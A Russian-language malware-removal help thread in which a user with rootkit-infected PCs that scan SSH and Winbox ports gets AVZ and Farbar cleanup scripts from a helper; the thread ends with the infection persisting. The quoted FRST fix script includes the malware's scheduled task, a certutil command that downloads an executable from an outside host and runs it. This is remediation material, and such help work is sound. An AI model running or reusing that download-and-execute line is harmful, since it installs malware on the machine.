Помогите победить Trojan.Spybot.795 Trojan.Rootkit.22042 и 22044 и ещё

[PAshaSTav 0]

Добрый день.

Каким то образом подхватил вирусы. KVRT и CureIt! определяю, но не лечат. Помогите с удалением.
CureIt! Определил:

Trojan.Spybot.795

Trojan.Rootkit.22042

Trojan.Rootkit.22044

После устранения нет эффекта. Всё по прежнему и появился запрос "требуется драйвер с цифровой подписью" для Winmon.sys и WinmonProcessMonitor.sys 

Так же с этой машины идёт большое количество пакетов по портам ssh и winbox. Соседние ПК определяют сетевую атаку от него.

 

P.S. У меня 3 ПК с похожей проблемой, но чуть с разным набором определившихся угроз. Рекомендации будут для всех одинаковые или мне создать отдельно 3 темы? Как мне правильно поступить?

CollectionLog-2020.12.24-18.01.zip

[thyrex 1 468]

Выполните скрипт в AVZ из папки Autologger

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
QuarantineFile('C:\Users\User\appdata\local\temp\csrss\wup\xarch\wup.exe','');
 SetServiceStart('WinDefender', 4);
 DeleteService('WinDefender');
 QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys','');
 QuarantineFile('C:\Windows\System32\drivers\Winmon.sys','');
 QuarantineFile('C:\Windows\system32\ntkrnlmp.exe','');
 TerminateProcessByName('c:\users\user\appdata\local\temp\csrss\ww30.exe');
 QuarantineFile('c:\users\user\appdata\local\temp\csrss\ww30.exe','');
 TerminateProcessByName('c:\windows\windefender.exe');
 QuarantineFile('c:\windows\windefender.exe','');
 TerminateProcessByName('c:\users\user\appdata\local\temp\csrss\ml20201210.exe');
 QuarantineFile('c:\users\user\appdata\local\temp\csrss\ml20201210.exe','');
 TerminateProcessByName('c:\windows\rss\csrss.exe');
 QuarantineFile('c:\windows\rss\csrss.exe','');
 DeleteFile('c:\windows\rss\csrss.exe','32');
 DeleteFile('c:\users\user\appdata\local\temp\csrss\ml20201210.exe','32');
 DeleteFile('c:\windows\windefender.exe','32');
 DeleteFile('c:\users\user\appdata\local\temp\csrss\ww30.exe','32');
 DeleteFile('C:\Windows\System32\drivers\Winmon.sys','64');
 DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys','64');
 BC_DeleteSvc('46e6f793093b15f1');
 BC_DeleteSvc('46e735542a5b1871');
 BC_DeleteSvc('46e7ac2f0a137d71');
 BC_DeleteSvc('4f94e31891fea971');
 BC_DeleteSvc('4F9603BA1B65E111');
 BC_DeleteSvc('4F964565E818A211');
 BC_DeleteSvc('4F967679104699F1');
 BC_DeleteSvc('4F967DC873248411');
 BC_DeleteSvc('4F96C7CAA19CD471');
 BC_DeleteSvc('4F96E45043ACF711');
 BC_DeleteSvc('4F96F3068A029BF1');
 BC_DeleteSvc('4F9765A189735411');
 BC_DeleteSvc('4F9765A2CA613091');
 BC_DeleteSvc('4F9765A387DE9171');
 BC_DeleteSvc('4F97D9A576B40E91');
 BC_DeleteSvc('4F97E861DCD2AA91');
 DeleteFile('C:\Windows\TEMP\310CB04.sys','64');
 DeleteFile('C:\Windows\TEMP\2C74D8C.sys','64');
 DeleteFile('C:\Windows\TEMP\2D8EDCF.sys','64');
 DeleteFile('C:\Windows\TEMP\2BAFC20.sys','64');
 DeleteFile('C:\Windows\TEMP\2B73C81.sys','64');
 DeleteFile('C:\Windows\TEMP\2FB7163.sys','64');
 DeleteFile('C:\Windows\TEMP\2E94F2E.sys','64');
 DeleteFile('C:\Windows\TEMP\332EBA9.sys','64');
 DeleteFile('C:\Windows\TEMP\2CD993E.sys','64');
 DeleteFile('C:\Windows\TEMP\2EFF93C.sys','64');
 DeleteFile('C:\Windows\TEMP\2D5D7F4.sys','64');
 DeleteFile('C:\Windows\TEMP\2C7F202.sys','64');
 DeleteFile('C:\Windows\TEMP\2b41d92.sys','64');
 DeleteFile('C:\Windows\TEMP\2a8ebbc.sys','64');
 DeleteFile('C:\Windows\TEMP\2fe5dc4.sys','64');
 DeleteFile('C:\Windows\TEMP\2d1dccd.sys','64');
 DeleteSchedulerTask('csrss');
 DeleteFile('C:\Users\User\appdata\local\temp\csrss\wup\xarch\wup.exe','32');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

• Обратите внимание: будет выполнена перезагрузка компьютера.

Выполните скрипт в AVZ

begin
CreateQurantineArchive('c:\quarantine.zip');
end.

c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678

Полученный после загрузки ответ сообщите здесь.

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.
 

[PAshaSTav 0]

Сделал.

Результат загрузки
Файл сохранён как    201224_153339_quarantine_5fe4b4d36c7ed.zip
Размер файла    21457329
MD5    38f8a33cfdb97bfb21e8819c0408ac0f

CollectionLog-2020.12.24-18.41.zip

[thyrex 1 468]

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD и 90 Days Files.

3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

[PAshaSTav 0]

Сделал.

 

FRST64-результат.zip

[thyrex 1 468]

Сделайте лог TDSSkiller

[PAshaSTav 0]

Обнаружил 2 объекта. Применить действия затем выслать сохранённый лог?

Изменено 24 декабря, 2020 пользователем PAshaSTav

[thyrex 1 468]

Да

[PAshaSTav 0]

Готово.

TDSSkiller log.txt

[thyrex 1 468]

Теперь удалите старый лог FRST.txt и сделайте новый.

[PAshaSTav 0]

Готово

FRST64-результат (2).zip

[thyrex 1 468]

1. Выделите следующий код:

Start::
CreateRestorePoint:
HKU\S-1-5-21-4225086931-2585650374-257642021-1000\...\Run: [LingeringShape] => C:\Windows\rss\csrss.exe [4506624 2020-12-24] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-4225086931-2585650374-257642021-1000\...\MountPoints2: E - E:\HiSuiteDownLoader.exe
HKU\S-1-5-21-4225086931-2585650374-257642021-1000\...\MountPoints2: {53d8f38a-c3da-11e9-a76f-74d435eb3279} - E:\HiSuiteDownLoader.exe
HKU\S-1-5-21-4225086931-2585650374-257642021-1000\...\MountPoints2: {bfbf4df6-9611-11e8-a025-74d435eb3279} - E:\HiSuiteDownLoader.exe
Task: {26EF2CF0-9953-4085-A73F-9AADC1B3EAD5} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://fotamene.com/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {778B4481-E14A-4BF2-8B1E-10792EECDCF3} - \Microsoft\Windows\DiskDiagnostic\Microsoft content -> No File <==== ATTENTION
Task: {A4688BD0-A25A-4FC1-813B-4C9D5200A8DD} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4506624 2020-12-24] () [File not signed] <==== ATTENTION
Task: {B9379380-9DEA-40DF-AA15-24E0D014AEFF} - \Microsoft\Windows\DiskDiagnostic\System Report -> No File <==== ATTENTION
"8BA309C" => service could not be unlocked. <==== ATTENTION
HKLM\SYSTEM\ControlSet001\Services\8BA309C => C:\Windows\System32\drivers\8BA309C.sys [138256 2020-12-24] (Access Denied)  [File not signed] <==== ATTENTION 
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
C:\Windows\windefender.exe
S3 46e0afc66ee7af71; \??\C:\Windows\TEMP\2d7e3e0.sys [X]
S3 46e29070b77a19f1; \??\C:\Windows\TEMP\2726818.sys [X]
S3 46e66f306418c991; \??\C:\Windows\TEMP\2cfef1e.sys [X]
S3 46e66f31c8c69571; \??\C:\Windows\TEMP\28fed65.sys [X]
S3 46e66f33fb2115f1; \??\C:\Windows\TEMP\28e0676.sys [X]
S3 46e66fc97f6ba411; \??\C:\Windows\TEMP\2a52453.sys [X]
S3 46e6f79308e15971; \??\C:\Windows\TEMP\28fe188.sys [X]
S3 46e73554922f6791; \??\C:\Windows\TEMP\4449383.sys [X]
S3 46e7ac2f10eb3291; \??\C:\Windows\TEMP\2d1675b.sys [X]
S3 4f94e318a4357e91; \??\C:\Windows\TEMP\2faa260.sys [X]
S3 4F954383A0BBDE91; \??\C:\Windows\TEMP\2A49989.sys [X]
S3 4F955019A5912011; \??\C:\Windows\TEMP\270B06B.sys [X]
S3 4F9570AF4F6B7DF1; \??\C:\Windows\TEMP\2CD71E8.sys [X]
S3 4F957188CFE36CF1; \??\C:\Windows\TEMP\2950F87.sys [X]
S3 4F9619E9C91196F1; \??\C:\Windows\TEMP\2F8F4F5.sys [X]
S3 4F962F68CFB766F1; \??\C:\Windows\TEMP\2F33FA3.sys [X]
S3 4F9663BCC2F56E91; \??\C:\Windows\TEMP\2CA5630.sys [X]
S3 4F96FBC5512FDD71; \??\C:\Windows\TEMP\2F7D8F4.sys [X]
S3 4F9728B1F08583F1; \??\C:\Windows\TEMP\2E5BC2A.sys [X]
S3 4F9765A1CE0F2071; \??\C:\Windows\TEMP\2ABBCC8.sys [X]
S3 4F9765A252352971; \??\C:\Windows\TEMP\2D78EE0.sys [X]
S3 4F9765A2EA1FD771; \??\C:\Windows\TEMP\2CFD0BB.sys [X]
S3 4F9765A3A31A5B71; \??\C:\Windows\TEMP\2B27216.sys [X]
S3 4F9765A4ABAD7DF1; \??\C:\Windows\TEMP\2B8719C.sys [X]
S3 4F9770359BB20D71; \??\C:\Windows\TEMP\2B226E8.sys [X]
S3 4F97A24752E3F791; \??\C:\Windows\TEMP\2D45E4C.sys [X]
S3 4F97A247BC404891; \??\C:\Windows\TEMP\2DDE55A.sys [X]
S3 4F97C4260375DD11; \??\C:\Windows\TEMP\2F10E03.sys [X]
U5 8BA309C;  <==== ATTENTION: Locked Service
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys <==== ATTENTION (Access Denied)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys <==== ATTENTION (Access Denied)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys <==== ATTENTION (Access Denied) <==== ATTENTION
2020-12-24 18:51 - 2020-12-24 20:51 - 000003482 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-12-24 18:51 - 2020-12-24 20:51 - 000003170 _____ C:\Windows\system32\Tasks\csrss
C:\Windows\rss\csrss.exe
C:\Windows\System32\drivers\Winmon.sys
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Users\User\AppData\Local\Temp\csrss
FirewallRules: [{5F7AFEA1-2D04-4331-9C88-19C673AFDAA9}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{ECB91E92-3510-4761-937F-82AC95507409}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{7BC96BFA-193C-47EB-A5CD-971C93D4C311}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{5C25918D-2C95-4A0C-A5D4-C1F490485B87}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{6FD69086-F954-4DE2-BE06-10D6623A12BA}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe => No File
FirewallRules: [{8B7BF8A3-2C28-429E-952D-70B66108392A}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe => No File
FirewallRules: [{56DEFBB9-9F5F-4500-8B72-AD0F558151DC}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe => No File
FirewallRules: [{58D6FB82-A149-4E95-9DBA-6DADCFB3A043}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe => No File
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\01519181.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\08948663.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\21095673.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\68412705.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\75638802.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\92825815.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\98447630.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\01519181.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\08948663.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\21095673.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\68412705.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\75638802.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\92825815.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\98447630.sys => ""="Driver"
Reboot:
End::

2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).
3. Запустите Farbar Recovery Scan Tool.
4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

[PAshaSTav 0]

готово

Fixlog.txt

[thyrex 1 468]

Что с проблемой?

[PAshaSTav 0]

Запросы в сеть, с него, продолжают идти по портам 22, 8728 и 8291 (несколько conhost.exe в процессах, видимо они).

И с её ip продолжаются атаки по сети.

После перезагрузки:

Например: TDSSkiller находит 3 угрозы среди них всё так же csrss.exe и windefender.exe.

 

И драйвера опять запрашивало.

 

Я бы сказал, что особо ни чего не изменилось.

 

Изменено 24 декабря, 2020 пользователем PAshaSTav